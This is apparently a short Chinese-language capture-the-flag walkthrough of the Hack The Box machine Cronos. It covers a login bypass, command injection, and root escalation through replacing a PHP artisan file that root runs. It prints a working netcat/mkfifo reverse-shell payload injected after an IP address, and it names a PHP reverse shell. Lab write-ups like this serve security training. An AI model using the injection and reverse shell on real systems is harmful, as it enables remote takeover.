添加10.10.10.13 cronos.htb
到/etc/hosts
同样添加到/etc/hosts
访问一下
直接绕过了
一看就是远程命令执行
抓包
确认完毕
上nc
10.10.14.8 && rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.118 1234 >/tmp/f
root用户在运行artisan
写个PHP脚本
替换它
然后连接
我用的php-reverse-shell.php
全部完成
在提权那卡住了
没练过在运行程序中查找文件这种题
开始还以为是内核提权呢